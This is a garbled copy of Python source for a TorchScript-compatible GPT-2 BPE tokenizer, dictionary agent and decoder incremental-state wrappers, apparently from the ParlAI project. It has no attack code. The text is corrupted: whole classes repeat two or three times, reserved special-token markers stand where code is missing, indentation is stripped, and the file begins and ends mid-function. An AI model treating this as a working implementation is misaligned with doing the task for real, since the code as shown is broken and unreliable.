text to tokenize
:return tokens:
A list of tokens
"""
bpe_tokens: List[str] = []
for token in self.findall(text):
byte_encoded: List[str] = []
for b in token:
byte_encoded.append(self.byte_encoder[ord(b)])
encoded: List[str] = []
for bpe_token in self.bpe(byte_encoded):
encoded.append(self.encoder[bpe_token])
bpe_tokens.extend(encoded)
return bpe_tokens
def decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into a text string.
:param tokens:
list of tokens
:return text:
decoded text
"""
output: List[str] = []
accum: List[str] = []
for token in tokens:
if token in self._special_tokens:
if len(accum) > 0:
output.append(self.helper_decode(accum))
accum.clear()
output.append(token)
else:
accum.append(token)
if len(accum) > 0:
output.append(self.helper_decode(accum))
text = ''.join(output)
if self.add_prefix_space:
assert text.startswith(' ')
text = text.lstrip(' ')
return text
def helper_decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into text string.
:param tokens:
list of tokens
:return:
decoded text
"""
chars: List[str] = []
for token in tokens:
decoded_token = self.decoder[token]
token_chars = self.utf8_chars(decoded_token)
for char in token_chars:
if not torch.jit.is_scripting():
chars.extend(list(char))
else:
chars.append(char)
decoded_chars: List[str] = []
for char in chars:
decoded_chars.append(chr(self.byte_decoder[char]))
return ''.join(decoded_chars)
def utf8_chars(self, s: str) ->List[str]:
"""
An implementation of UTF8 character iteration in TorchScript. There are no
bitwise operations in torchscript, so we compare directly to integer values.
There isn't a lot of validation, for instance if you pass in an improperly
encoded string with an out-of-place continuation byte, or with a non-left-to-
right byte order, you'll get unexpected results and likely throw. Torch itself
takes in unicode strings and encodes them as UTF8, so that should be actively
hard to do.
The logic is simple: looking at the current start-of-character byte.
If its high bit is 0, it's a 1-byte character. Otherwise, the number of
bytes is the number of leading 1s in its binary representation, so
find that number by comparing it directly to ints with the appropriate
representation, then append that many bytes as a character and move past
them to the next start byte.
From pytext.torchscript.utils.
"""
chars: List[str] = []
i = 0
while i < len(s):
byte = ord(s[i])
if byte < 128:
chars.append(s[i])
i += 1
else:
if byte < 224:
num_bytes = 2
elif byte < 240:
num_bytes = 3
elif byte < 248:
num_bytes = 4
elif byte < 252:
num_bytes = 5
elif byte < 254:
num_bytes = 6
elif byte < 255:
num_bytes = 7
else:
num_bytes = 8
chars.append(s[i:i + num_bytes])
i += num_bytes
return chars
@torch.jit.script
class ScriptableDictionaryAgent:
"""
Builds and/or loads a dictionary.
All code is TorchScriptable.
"""
def __init__(self, null_token: str, end_token: str, unk_token: str,
start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],
ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:
Dict[str, str], bpe_byte_encoder: Dict[int, str],
fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):
self.null_token = null_token
self.end_token = end_token
self.unk_token = unk_token
self.start_token = start_token
self.freq = freq
self.tok2ind = tok2ind
self.ind2tok = ind2tok
self._unk_token_idx = self.tok2ind[self.unk_token]
self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=
bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=
bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,
special_tokens=special_tokens)
def _word_lookup(self, key: str) ->int:
"""
Return index from token, or unk_token's index, or None.
"""
if key in self.tok2ind:
return self.tok2ind[key]
else:
return self._unk_token_idx
def _index_lookup(self, key: int) ->str:
"""
Return token from index, or unk_token.
"""
if key in self.ind2tok:
return self.ind2tok[key]
else:
return self.unk_token
def gpt2_tokenize(self, text: str):
"""
Tokenize using Gpt2 BPE tokenizer.
"""
return self.bpe_tokenize(text)
def tokenize(self, text: str) ->List[str]:
"""
Return a sequence of tokens from the iterable.
Also handles special tokens for some tokenizers
"""
word_tokens = self.gpt2_tokenize(text)
return word_tokens
def bpe_tokenize(self, text: str) ->List[str]:
"""
Return a sequence of BPE-tokens from the text.
"""
return self.bpe.encode(text)
def txt2vec(self, text: str) ->List[int]:
"""
Convert a string to a vector (list of ints).
First runs a sentence tokenizer, then a word tokenizer.
"""
itr: List[int] = []
for token in self.tokenize(str(text)):
itr.append(self._word_lookup(token))
return itr
def vec2txt(self, vector: List[int]) ->str:
"""
Convert a vector of IDs to a string.
Converts a vector (iterable of ints) into a string, with each token separated by
the delimiter (default ``' '``).
"""
tokens = [self._index_lookup(idx) for idx in vector]
text = self.bpe.decode(tokens)
return text
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseIncrStateFlattener(nn.Module):
<|reserved_special_token_0|>
def __init__(self, module: nn.Module):
super().__init__()
self.module = module
<|reserved_special_token_0|>
def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,
Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:
"""
Flatten the input incremental state.
For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored
in flat_incr_state['layer_0__self_attn__prev_key'].
"""
flat_incr_state = {}
for layer_idx, dict1 in structured_incr_state.items():
for attn_type, dict2 in dict1.items():
for state_type, state in dict2.items():
key = f'{layer_idx:d}__{attn_type}__{state_type}'
flat_incr_state[key] = state
return flat_incr_state
class DecoderIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .forward().
"""
def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.
Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.
Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:
if flat_incr_state is not None:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
else:
structured_incr_state = None
tensor, new_structured_incr_state = self.module.forward(input=
input_, encoder_state=encoder_state, incr_state=
structured_incr_state)
new_flat_incr_state = self._flatten_incr_state(
new_structured_incr_state)
return tensor, new_flat_incr_state
class ModelIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .reorder_decoder_incremental_state(). We also support .output(), which is also
traced.
"""
def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,
torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
new_structured_incr_state = (self.module.
reorder_decoder_incremental_state(incremental_state=
structured_incr_state, inds=inds))
return self._flatten_incr_state(new_structured_incr_state)
def output(self, tensor: torch.Tensor) ->torch.Tensor:
return self.module.output(tensor)
@torch.jit.script
class ScriptableGpt2BpeHelper(object):
"""
Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.
"""
@classmethod
def findall(cls, text: str) ->List[str]:
"""
Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.
"""
contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']
tokens: List[str] = []
idx = 0
num_passes = 0
while idx < len(text):
num_passes += 1
if num_passes > 10000:
return [
'*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'
]
if text[idx] == "'":
captured_suffix = False
for ending in contraction_endings:
if text[idx + 1:idx + 1 + len(ending)] == ending:
tokens.append("'" + ending)
idx += 1 + len(ending)
captured_suffix = True
break
if captured_suffix:
continue
if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(
text) and not text[idx + 1].isspace():
if text[idx] == ' ':
last_matching_idx = idx + 1
else:
last_matching_idx = idx
if text[last_matching_idx].isalpha():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isalpha():
last_matching_idx += 1
elif text[last_matching_idx].isnumeric():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
else:
while last_matching_idx + 1 < len(text) and not text[
last_matching_idx + 1].isspace() and not text[
last_matching_idx + 1].isalpha() and not text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
tokens.append(text[idx:last_matching_idx + 1])
idx = last_matching_idx + 1
continue
if idx + 1 < len(text) and text[idx + 1].isspace():
last_space_idx = idx + 1
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
if last_space_idx + 1 == len(text):
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
else:
tokens.append(text[idx:last_space_idx])
idx = last_space_idx
continue
if True:
last_space_idx = idx
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
return tokens
def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],
byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],
special_tokens: List[str]):
self.add_prefix_space = add_prefix_space
self.encoder = encoder
self.decoder: Dict[str, str] = {}
for k, v in self.encoder.items():
self.decoder[v] = k
self.byte_encoder = byte_encoder
self.byte_decoder: Dict[str, int] = {}
for k, v in self.byte_encoder.items():
self.byte_decoder[v] = k
self.bpe_ranks = fused_key_bpe_ranks
self._special_tokens: Dict[str, int] = {}
for st in special_tokens:
self._special_tokens[st] = 1
def encode(self, text: str) ->List[str]:
"""
Tokenize text.
Checks for add_prefix_space; handles accordingly.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
if self.add_prefix_space:
text = f' {text}'
FINAL = 1
SPLITABLE = 0
pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]
for special_token in self._special_tokens.keys():
i = 0
while i < len(pieces):
subtext, status = pieces[i]
if status == FINAL:
i += 1
continue
split = subtext.split(special_token)
if len(split) > 1:
pieces.pop(i)
for j, piece in enumerate(split):
if j > 0:
pieces.insert(i + j, (special_token, FINAL))
pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))
else:
i += 1
output: List[str] = []
for piece, state in pieces:
if state is FINAL:
output.append(piece)
else:
output += self.helper_encode(piece)
text = ''.join(output)
return output
def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:
"""
Return set of symbol pairs in a word.
Word is represented as list of symbols (symbols being variable-length strings).
:param word:
word to symbolize
:return pairs:
set of tuples of symbols
"""
pairs: List[Tuple[str, str]] = []
prev_char = word[0]
for char in word[1:]:
pairs.append((prev_char, char))
prev_char = char
return pairs
def bpe(self, word: List[str]) ->List[str]:
"""
Convert token to BPE.
:param word:
list of tokens token to convert
:return bpe_encoding:
string bpe encoding
"""
pairs = self.get_pairs(word)
if len(pairs) == 0:
return word
while True:
min_rank = self.bpe_ranks.get('\n'.join(pairs[0]), float('inf'))
bigram = pairs[0]
for pair in pairs[1:]:
current_rank = self.bpe_ranks.get('\n'.join(pair), float('inf')
)
if current_rank < min_rank:
min_rank = current_rank
bigram = pair
if '\n'.join(bigram) not in self.bpe_ranks:
break
first, second = bigram
new_word: List[str] = []
i = 0
while i < len(word):
found = False
for j in range(i, len(word)):
if word[j] == first:
new_word.extend(word[i:j])
i = j
found = True
break
if not found:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word) - 1 and word[i + 1
] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
word = new_word.copy()
if len(word) == 1:
break
else:
pairs = self.get_pairs(word)
return word
def helper_encode(self, text: str) ->List[str]:
"""
Tokenize text.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
bpe_tokens: List[str] = []
for token in self.findall(text):
byte_encoded: List[str] = []
for b in token:
byte_encoded.append(self.byte_encoder[ord(b)])
encoded: List[str] = []
for bpe_token in self.bpe(byte_encoded):
encoded.append(self.encoder[bpe_token])
bpe_tokens.extend(encoded)
return bpe_tokens
def decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into a text string.
:param tokens:
list of tokens
:return text:
decoded text
"""
output: List[str] = []
accum: List[str] = []
for token in tokens:
if token in self._special_tokens:
if len(accum) > 0:
output.append(self.helper_decode(accum))
accum.clear()
output.append(token)
else:
accum.append(token)
if len(accum) > 0:
output.append(self.helper_decode(accum))
text = ''.join(output)
if self.add_prefix_space:
assert text.startswith(' ')
text = text.lstrip(' ')
return text
def helper_decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into text string.
:param tokens:
list of tokens
:return:
decoded text
"""
chars: List[str] = []
for token in tokens:
decoded_token = self.decoder[token]
token_chars = self.utf8_chars(decoded_token)
for char in token_chars:
if not torch.jit.is_scripting():
chars.extend(list(char))
else:
chars.append(char)
decoded_chars: List[str] = []
for char in chars:
decoded_chars.append(chr(self.byte_decoder[char]))
return ''.join(decoded_chars)
def utf8_chars(self, s: str) ->List[str]:
"""
An implementation of UTF8 character iteration in TorchScript. There are no
bitwise operations in torchscript, so we compare directly to integer values.
There isn't a lot of validation, for instance if you pass in an improperly
encoded string with an out-of-place continuation byte, or with a non-left-to-
right byte order, you'll get unexpected results and likely throw. Torch itself
takes in unicode strings and encodes them as UTF8, so that should be actively
hard to do.
The logic is simple: looking at the current start-of-character byte.
If its high bit is 0, it's a 1-byte character. Otherwise, the number of
bytes is the number of leading 1s in its binary representation, so
find that number by comparing it directly to ints with the appropriate
representation, then append that many bytes as a character and move past
them to the next start byte.
From pytext.torchscript.utils.
"""
chars: List[str] = []
i = 0
while i < len(s):
byte = ord(s[i])
if byte < 128:
chars.append(s[i])
i += 1
else:
if byte < 224:
num_bytes = 2
elif byte < 240:
num_bytes = 3
elif byte < 248:
num_bytes = 4
elif byte < 252:
num_bytes = 5
elif byte < 254:
num_bytes = 6
elif byte < 255:
num_bytes = 7
else:
num_bytes = 8
chars.append(s[i:i + num_bytes])
i += num_bytes
return chars
@torch.jit.script
class ScriptableDictionaryAgent:
"""
Builds and/or loads a dictionary.
All code is TorchScriptable.
"""
def __init__(self, null_token: str, end_token: str, unk_token: str,
start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],
ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:
Dict[str, str], bpe_byte_encoder: Dict[int, str],
fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):
self.null_token = null_token
self.end_token = end_token
self.unk_token = unk_token
self.start_token = start_token
self.freq = freq
self.tok2ind = tok2ind
self.ind2tok = ind2tok
self._unk_token_idx = self.tok2ind[self.unk_token]
self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=
bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=
bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,
special_tokens=special_tokens)
def _word_lookup(self, key: str) ->int:
"""
Return index from token, or unk_token's index, or None.
"""
if key in self.tok2ind:
return self.tok2ind[key]
else:
return self._unk_token_idx
def _index_lookup(self, key: int) ->str:
"""
Return token from index, or unk_token.
"""
if key in self.ind2tok:
return self.ind2tok[key]
else:
return self.unk_token
def gpt2_tokenize(self, text: str):
"""
Tokenize using Gpt2 BPE tokenizer.
"""
return self.bpe_tokenize(text)
def tokenize(self, text: str) ->List[str]:
"""
Return a sequence of tokens from the iterable.
Also handles special tokens for some tokenizers
"""
word_tokens = self.gpt2_tokenize(text)
return word_tokens
def bpe_tokenize(self, text: str) ->List[str]:
"""
Return a sequence of BPE-tokens from the text.
"""
return self.bpe.encode(text)
def txt2vec(self, text: str) ->List[int]:
"""
Convert a string to a vector (list of ints).
First runs a sentence tokenizer, then a word tokenizer.
"""
itr: List[int] = []
for token in self.tokenize(str(text)):
itr.append(self._word_lookup(token))
return itr
def vec2txt(self, vector: List[int]) ->str:
"""
Convert a vector of IDs to a string.
Converts a vector (iterable of ints) into a string, with each token separated by
the delimiter (default ``' '``).
"""
tokens = [self._index_lookup(idx) for idx in vector]
text = self.bpe.decode(tokens)
return text
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class BaseIncrStateFlattener(nn.Module):
<|reserved_special_token_0|>
def __init__(self, module: nn.Module):
super().__init__()
self.module = module
def _unflatten_incr_state(self, flat_incr_state: Dict[str, torch.Tensor]
) ->Dict[int, Dict[str, Dict[str, torch.Tensor]]]:
"""
Unflatten the input incremental state.
For instance, flat_incr_state['layer_0__self_attn__prev_key'] will be stored in
structured_incr_state[0]['self_attn']['prev_key'].
"""
structured_incr_state = defaultdict(lambda : defaultdict(dict))
for key, state in flat_incr_state.items():
layer_idx_str, attn_type, state_type = key.split('__')
structured_incr_state[int(layer_idx_str)][attn_type][state_type
] = state
return dict({k: dict(v) for k, v in structured_incr_state.items()})
def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,
Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:
"""
Flatten the input incremental state.
For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored
in flat_incr_state['layer_0__self_attn__prev_key'].
"""
flat_incr_state = {}
for layer_idx, dict1 in structured_incr_state.items():
for attn_type, dict2 in dict1.items():
for state_type, state in dict2.items():
key = f'{layer_idx:d}__{attn_type}__{state_type}'
flat_incr_state[key] = state
return flat_incr_state
class DecoderIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .forward().
"""
def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.
Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.
Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:
if flat_incr_state is not None:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
else:
structured_incr_state = None
tensor, new_structured_incr_state = self.module.forward(input=
input_, encoder_state=encoder_state, incr_state=
structured_incr_state)
new_flat_incr_state = self._flatten_incr_state(
new_structured_incr_state)
return tensor, new_flat_incr_state
class ModelIncrStateFlattener(BaseIncrStateFlattener):
"""
Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.
Unflattening/flattening will occur before passing the incremental state into and out
of .reorder_decoder_incremental_state(). We also support .output(), which is also
traced.
"""
def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,
torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:
structured_incr_state = self._unflatten_incr_state(flat_incr_state)
new_structured_incr_state = (self.module.
reorder_decoder_incremental_state(incremental_state=
structured_incr_state, inds=inds))
return self._flatten_incr_state(new_structured_incr_state)
def output(self, tensor: torch.Tensor) ->torch.Tensor:
return self.module.output(tensor)
@torch.jit.script
class ScriptableGpt2BpeHelper(object):
"""
Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.
"""
@classmethod
def findall(cls, text: str) ->List[str]:
"""
Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.
"""
contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']
tokens: List[str] = []
idx = 0
num_passes = 0
while idx < len(text):
num_passes += 1
if num_passes > 10000:
return [
'*** Infinite loop in ScriptableGpt2BpeHelper.findall()! ***'
]
if text[idx] == "'":
captured_suffix = False
for ending in contraction_endings:
if text[idx + 1:idx + 1 + len(ending)] == ending:
tokens.append("'" + ending)
idx += 1 + len(ending)
captured_suffix = True
break
if captured_suffix:
continue
if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(
text) and not text[idx + 1].isspace():
if text[idx] == ' ':
last_matching_idx = idx + 1
else:
last_matching_idx = idx
if text[last_matching_idx].isalpha():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isalpha():
last_matching_idx += 1
elif text[last_matching_idx].isnumeric():
while last_matching_idx + 1 < len(text) and text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
else:
while last_matching_idx + 1 < len(text) and not text[
last_matching_idx + 1].isspace() and not text[
last_matching_idx + 1].isalpha() and not text[
last_matching_idx + 1].isnumeric():
last_matching_idx += 1
tokens.append(text[idx:last_matching_idx + 1])
idx = last_matching_idx + 1
continue
if idx + 1 < len(text) and text[idx + 1].isspace():
last_space_idx = idx + 1
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
if last_space_idx + 1 == len(text):
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
else:
tokens.append(text[idx:last_space_idx])
idx = last_space_idx
continue
if True:
last_space_idx = idx
while last_space_idx + 1 < len(text) and text[
last_space_idx + 1].isspace():
last_space_idx += 1
tokens.append(text[idx:last_space_idx + 1])
idx = last_space_idx + 1
return tokens
def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],
byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],
special_tokens: List[str]):
self.add_prefix_space = add_prefix_space
self.encoder = encoder
self.decoder: Dict[str, str] = {}
for k, v in self.encoder.items():
self.decoder[v] = k
self.byte_encoder = byte_encoder
self.byte_decoder: Dict[str, int] = {}
for k, v in self.byte_encoder.items():
self.byte_decoder[v] = k
self.bpe_ranks = fused_key_bpe_ranks
self._special_tokens: Dict[str, int] = {}
for st in special_tokens:
self._special_tokens[st] = 1
def encode(self, text: str) ->List[str]:
"""
Tokenize text.
Checks for add_prefix_space; handles accordingly.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
if self.add_prefix_space:
text = f' {text}'
FINAL = 1
SPLITABLE = 0
pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]
for special_token in self._special_tokens.keys():
i = 0
while i < len(pieces):
subtext, status = pieces[i]
if status == FINAL:
i += 1
continue
split = subtext.split(special_token)
if len(split) > 1:
pieces.pop(i)
for j, piece in enumerate(split):
if j > 0:
pieces.insert(i + j, (special_token, FINAL))
pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))
else:
i += 1
output: List[str] = []
for piece, state in pieces:
if state is FINAL:
output.append(piece)
else:
output += self.helper_encode(piece)
text = ''.join(output)
return output
def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:
"""
Return set of symbol pairs in a word.
Word is represented as list of symbols (symbols being variable-length strings).
:param word:
word to symbolize
:return pairs:
set of tuples of symbols
"""
pairs: List[Tuple[str, str]] = []
prev_char = word[0]
for char in word[1:]:
pairs.append((prev_char, char))
prev_char = char
return pairs
def bpe(self, word: List[str]) ->List[str]:
"""
Convert token to BPE.
:param word:
list of tokens token to convert
:return bpe_encoding:
string bpe encoding
"""
pairs = self.get_pairs(word)
if len(pairs) == 0:
return word
while True:
min_rank = self.bpe_ranks.get('\n'.join(pairs[0]), float('inf'))
bigram = pairs[0]
for pair in pairs[1:]:
current_rank = self.bpe_ranks.get('\n'.join(pair), float('inf')
)
if current_rank < min_rank:
min_rank = current_rank
bigram = pair
if '\n'.join(bigram) not in self.bpe_ranks:
break
first, second = bigram
new_word: List[str] = []
i = 0
while i < len(word):
found = False
for j in range(i, len(word)):
if word[j] == first:
new_word.extend(word[i:j])
i = j
found = True
break
if not found:
new_word.extend(word[i:])
break
if word[i] == first and i < len(word) - 1 and word[i + 1
] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
word = new_word.copy()
if len(word) == 1:
break
else:
pairs = self.get_pairs(word)
return word
def helper_encode(self, text: str) ->List[str]:
"""
Tokenize text.
:param text:
text to tokenize
:return tokens:
A list of tokens
"""
bpe_tokens: List[str] = []
for token in self.findall(text):
byte_encoded: List[str] = []
for b in token:
byte_encoded.append(self.byte_encoder[ord(b)])
encoded: List[str] = []
for bpe_token in self.bpe(byte_encoded):
encoded.append(self.encoder[bpe_token])
bpe_tokens.extend(encoded)
return bpe_tokens
def decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into a text string.
:param tokens:
list of tokens
:return text:
decoded text
"""
output: List[str] = []
accum: List[str] = []
for token in tokens:
if token in self._special_tokens:
if len(accum) > 0:
output.append(self.helper_decode(accum))
accum.clear()
output.append(token)
else:
accum.append(token)
if len(accum) > 0:
output.append(self.helper_decode(accum))
text = ''.join(output)
if self.add_prefix_space:
assert text.startswith(' ')
text = text.lstrip(' ')
return text
def helper_decode(self, tokens: List[str]) ->str:
"""
Decode list of tokens into text string.
:param tokens:
list of tokens
:return:
decoded text
"""
chars: List[str] = []
for token in tokens:
decoded_token = self.decoder[token]
token_chars = self.utf8_chars(decoded_token)
for char in token_chars:
if not torch.jit.is_scripting():
chars.extend(list(char))
else:
chars.append(char)
decoded_chars: List[str] = []
for char in chars:
decoded_chars.append(chr(self.byte_decoder[char]))
return ''.join(decoded_chars)
def utf8_chars(self, s: str) ->List[str]:
"""
An implementation of UTF8 character iteration in TorchScript. There are no
bitwise operations in torchscript, so we compare directly to integer values.
There isn't a lot of validation, for instance if you pass in an improperly
encoded string with an out-of-place continuation byte, or with a non-left-to-
right byte order, you'll get unexpected results and likely throw. Torch itself
takes in unicode strings and encodes them as UTF8, so that should be actively
hard to do.
The logic is simple: looking at the current start-of-character byte.
If its high bit is 0, it's a 1-byte character. Otherwise, the number of
bytes is the number of leading 1s in its binary representation, so
find that number by comparing it directly to ints with the appropriate
representation, then append that many bytes as a character and move past
them to the next start byte.
From pytext.torchscript.utils.
"""
chars: List[str] = []
i = 0
while i < len(s):
byte = ord(s[i])
if byte < 128:
chars.append(s[i])
i += 1
else:
if byte < 224:
num_bytes = 2
elif byte < 240:
num_bytes = 3
elif byte < 248:
num_bytes = 4
elif byte < 252:
num_bytes = 5
elif byte < 254:
num_bytes = 6
elif byte < 255:
num_bytes = 7
else:
num_bytes = 8
chars.append(s[i:i + num_bytes])
i += num_bytes
return chars
@torch.jit.script
class ScriptableDictionaryAgent:
"""
Builds and/or loads a dictionary.
All code is TorchScriptable.
"""
def __init__(self, null_token: str, end_token: str, unk_token: str,
start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],
ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:
Dict[str, str], bpe_byte_encoder: Dict[int, str],
fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):
self.null_token = null_token
self.end_token = end_token
self.unk_token = unk_token
self.start_token = start_token
self.freq = freq
self.tok2ind = tok2ind
self.ind2tok = ind2tok
self._unk_token_idx = self.tok2ind[self.unk_token]
self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=
bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=
bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,
special_tokens=special_tokens)
def _word_lookup(self, key: str) ->int:
"""
Return index from token, or unk_token's index, or None.
"""
if key in self.tok2ind:
return self.tok2ind[key]
else:
return self._unk_token_idx
def _index_lookup(self, key: int) ->str:
"""
Return token from index, or unk_token.
"""
if key in self.ind2tok:
return self.ind2tok[key]
else:
return self.unk_token
def gpt2_tokenize(self, text: str):
"""
Tokenize using Gpt2 BPE tokenizer.
"""
return self.bpe_tokenize(text)
def tokenize(self, text: str) ->List[str]:
"""
Return a sequence of tokens from the iterable.
Also handles special tokens for some tokenizers
"""
word_tokens = self.gpt2_tokenize(text)
return word_tokens
def bpe_tokenize(self, text: str) ->List[str]:
"""
Return a sequence of BPE-tokens from the text.
"""
return self.bpe.encode(text)
def txt2vec(self, text: str) ->List[int]:
"""
Convert a string to a vector (list of ints).
First runs a sentence tokenizer, then a word tokenizer.
"""
itr: List[int] = []
for token in self.tokenize(str(text)):
itr.append(self._word_lookup(token))
return itr
def vec2txt(self, vector: List[int]) ->str:
"""
Convert a vector of IDs to a string.
Converts a vector (iterable of ints) into a string, with each token separated by
the delimiter (default ``' '``).
"""
tokens = [self._index_lookup(idx) for idx in vector]
text = self.bpe.decode(tokens)
return text
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TorchScriptGreedySearch(nn.Module):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, agent: TorchAgent):
super().__init__()
self.is_bart = agent.opt['model'] == 'bart'
for key, val in self.CAIRAOKE_DICT_PARAMS.items():
assert agent.opt.get(key, val
) == val, f'The only currently supported value of "{key}" is {val}!'
orig_dict: DictionaryAgent = agent.dict
orig_bpe: Gpt2BpeHelper = orig_dict.bpe
assert all(len(key) == 2 for key in orig_bpe.bpe_ranks.keys())
assert not any(i for key in orig_bpe.bpe_ranks.keys() for i in key if
'\n' in i
), "We need to temporarily merge the bpe_ranks dict's keys with a newline character in order to use it as a TorchScript arg, but at least one of the dict's keys contains a newline character already!"
fused_key_bpe_ranks = {'\n'.join(key): float(val) for key, val in
orig_bpe.bpe_ranks.items()}
self.dict = ScriptableDictionaryAgent(null_token=orig_dict.
null_token, end_token=orig_dict.end_token, unk_token=orig_dict.
unk_token, start_token=orig_dict.start_token, freq=orig_dict.
freq, tok2ind=orig_dict.tok2ind, ind2tok=orig_dict.ind2tok,
bpe_add_prefix_space=agent.opt['bpe_add_prefix_space'],
bpe_encoder=orig_bpe.encoder, bpe_byte_encoder=orig_bpe.
byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,
special_tokens=agent._get_special_tokens())
self.delimiter_tok = agent.history.delimiter_tok
self.history_size = agent.opt['history_size']
if agent.opt.get('history_add_global_end_token', None) is not None:
self.global_end_token = agent.dict[agent.dict.end_token]
else:
self.global_end_token = None
self.text_truncate = agent.opt.get('text_truncate') or agent.opt[
'truncate']
self.text_truncate = (self.text_truncate if self.text_truncate >= 0
else None)
self.start_idx = agent.model.START_IDX
self.end_idx = agent.model.END_IDX
self.null_idx = agent.model.NULL_IDX
if self.is_bart:
self.initial_decoder_input = [self.end_idx, self.start_idx]
else:
self.initial_decoder_input = [self.start_idx]
agent.model.eval()
wrapped_decoder = DecoderIncrStateFlattener(agent.model.decoder)
wrapped_model = ModelIncrStateFlattener(agent.model)
sample_tokens = torch.tensor([[1, 2, 3, 4, 5]], dtype=torch.long)
encoder_states = agent.model.encoder(sample_tokens)
initial_generations = self._get_initial_decoder_input(sample_tokens)
latent, initial_incr_state = wrapped_decoder(initial_generations,
encoder_states)
logits = agent.model.output(latent[:, -1:, :])
_, preds = logits.max(dim=2)
incr_state = {k: torch.clone(v) for k, v in initial_incr_state.items()}
incr_state = wrapped_model.reorder_decoder_incremental_state(incr_state
, torch.tensor([0], dtype=torch.long, device=sample_tokens.device))
generations = torch.cat([initial_generations, preds], dim=1)
